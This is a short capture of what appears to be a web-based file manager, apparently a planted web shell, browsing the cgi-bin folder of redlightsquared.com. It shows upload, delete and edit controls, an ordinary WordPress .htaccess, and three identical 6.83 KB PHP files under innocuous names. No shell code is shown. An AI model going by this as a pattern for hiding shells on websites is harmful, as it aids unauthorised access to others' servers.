golden hour
/home/godaofbq/redlightsquared.com/cgi-bin
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
197 B
Del
OK
error_log
485 B
Del
OK
plugin-install.php
6.83 KB
Del
OK
test.php
6.83 KB
Del
OK
wp-signup.php
6.83 KB
Del
OK
Edit: .htaccess
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>
Save